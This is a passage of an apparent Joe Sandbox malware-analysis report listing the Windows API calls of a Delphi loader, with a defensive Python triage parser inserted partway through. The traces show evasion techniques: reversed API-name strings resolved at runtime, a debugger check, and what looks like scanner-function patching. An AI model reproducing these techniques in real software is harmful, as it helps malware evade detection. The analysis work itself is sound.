• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 5464823176674621976dd363f9a2af69cc5c4a7353b612f69ee2cea3856b3519
• Instruction ID: 53e82dc9c0d906af648f1c9e2db8faa565e569c95637e59b4c944f34e202e19a
• Opcode Fuzzy Hash: 5464823176674621976dd363f9a2af69cc5c4a7353b612f69ee2cea3856b3519
• Instruction Fuzzy Hash: 2BF0F6A0AC4304F4F652E6A07C3AFD9235C9F04B52F544604B36AA83C297A08CC8CB32
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DBAD7D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DBAD98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
                                                                                                                                                                                                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 02DBAEFB
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF18
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF1E
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,02DBAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF33
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,02DBAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF39
                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02DBAF5B
                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DBAF71
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DBE625
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DBE641
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02DBE67A
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DBE6F7
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02DBE710
• VariantCopy.OLEAUT32(?,00000000), ref: 02DBE745
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DB35BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DB35ED
• RegCloseKey.ADVAPI32(?,02DB3610,00000000,?,00000004,00000000,02DB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DB3603
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
APIs
• GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
• GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
• GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: Kernel32$sserddAcorPteG
• API String ID: 667068680-1372893251
APIs
• GetThreadLocale.KERNEL32(?,00000000,02DBAAE7,?,?,00000000), ref: 02DBAA68
  • Part of subcall function 02DBA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,02DBAAE7,?,?,00000000), ref: 02DBAA98
• EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02DBAAA3
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,02DBAAE7,?,?,00000000), ref: 02DBAAC1
• EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02DBAACC
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4102113445-0
APIs
• GetThreadLocale.KERNEL32(?,00000000,02DBACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02DBAB2F
  • Part of subcall function 02DBA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,02DCFAEB,UacInitialize,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,Initialize), ref: 02DCF6EE
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DCF700
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,02DDD10B,00000000,02DDD11E), ref: 02DBC47A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02DBC48B
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DBE297
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DBE2B3
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DBE32A
• VariantClear.OLEAUT32(?), ref: 02DBE353
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DBAD7D
• GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DBAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DBAD7D
• GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DBAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b5ba093c0329de98d5dbb451ac30612b9acf586cdc79fa9978f5362bd25377a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 812feeecd1d7b6629f76eee262bbcde0268f26eb04538ea08e90f2a56f1852c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b5ba093c0329de98d5dbb451ac30612b9acf586cdc79fa9978f5362bd25377a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88412B74A40258DBDB22DB68CC94BDAB7FDAF08301F4400E5A549E7341DB709F848FA0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5dcb1184ad0b6b07c94b4b3e8e3039c6894b215ced635ccb15de6b3a73381e16
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: da9c436ff5add023a4997114987df18eda3ea0e66eaf30d40c1c286611400f00
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dcb1184ad0b6b07c94b4b3e8e3039c6894b215ced635ccb15de6b3a73381e16
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0A1E4A67106048BD71AAA7D9CB43EDB3D2DF85225F28423EE11ECB3C1DB68CD45C660
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02DB95DA), ref: 02DB9572
                                                                                                                                                                                                                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02DB95DA), ref: 02DB9578
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                                                                                                                  • String ID: yyyy
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 142e2322d3f057634ab909492e7c4b8692c16fee78897a99e9667bec719393aa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d393ea06584b8791eea0aad943a85c6fd63a72d7c2969c163c353961fdf8159c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 142e2322d3f057634ab909492e7c4b8692c16fee78897a99e9667bec719393aa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10214F71A04198DFDB12DF64C871AEA73F9EF09710F4140A5E906E7351D630EE40CEA5
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cff5785828b4193164179e87d8dec5d7919f167263a5f656202cbed637630af5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 792e5612f16921c601fc5e880ce9c8f3d7ff3bc5d23a7e4d081300da9c2d07d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cff5785828b4193164179e87d8dec5d7919f167263a5f656202cbed637630af5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B016D71680309EFEB02EFA5EC65F9AB7EDEB48B00FA15464B901D7740D670AD50AA34
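The "APIs" lines in these function blocks follow a fixed shape (an optional "Part of subcall function <addr>:" prefix, then Api.MODULE(args), ref: <addr>), which makes them easy to mine in bulk when triaging a report like this one. The following parser is an added example written for this page; it is not part of Joe Sandbox or its IDA plugin, and the behaviour labels it assigns (dynamic API resolution, code patching, memory probing) are this editor's own triage heuristics, not report fields. The sample input is copied from the FlushInstructionCache and IsBadReadPtr blocks of this report; the `?` placeholders and 8-digit hex values are the sandbox's unresolved and numeric stack arguments.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input: API lines copied verbatim from the function blocks of this report
# (the "Part of subcall function" prefix marks calls made by a callee of the function).
SAMPLE_API_LINES = """\
• Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
• Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
• Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
• Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
• Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCAF58
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02DCAF88
"""

# One API line: "• [Part of subcall function ADDR: ]Api.MODULE(arg,arg,...), ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")  # a raw 32-bit stack value as printed by the sandbox


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                        # address of the call site in the dumped module
    subcall: Optional[int] = None   # address of the callee when the call is indirect


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line in `text`; headers such as 'APIs' or 'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("subcall")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def string_args(call: ApiCall) -> List[str]:
    """Arguments the sandbox resolved to strings (module or export names), in order."""
    return [a for a in call.args if a != "?" and not HEX_ARG.match(a)]


def behaviours(calls: List[ApiCall]) -> List[str]:
    """Heuristic triage labels (this example's own, not Joe Sandbox signatures)."""
    names = {c.api for c in calls}
    found = []
    # A module handle followed by GetProcAddress means the code resolves imports itself,
    # hiding them from the static import table.
    if names & {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"} \
            and "GetProcAddress" in names:
        found.append("dynamic-api-resolution")
    # Flushing the instruction cache is only needed after writing code into memory.
    if "FlushInstructionCache" in names:
        found.append("self-modifying-or-patched-code")
    # IsBad*Ptr probing is typical of code walking structures it did not allocate itself.
    if names & {"IsBadReadPtr", "IsBadWritePtr"}:
        found.append("memory-probing")
    return found


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for c in parsed:
        where = f" (via {c.subcall:08X})" if c.subcall is not None else ""
        print(f"{c.ref:08X}: {c.api}.{c.module} strings={string_args(c)}{where}")
    print("behaviours:", behaviours(parsed))
```

Run against a whole report, the same parser lets you group calls by `subcall` address (here 02DC81CC and 02DC8274 are the resolver helpers shared by several listed functions) and by string argument, which is a quicker way to recover the loader's dynamically resolved API set than reading each block by hand.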
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCAF58
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02DCAF88
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02DCAFA7
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCAFB3
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
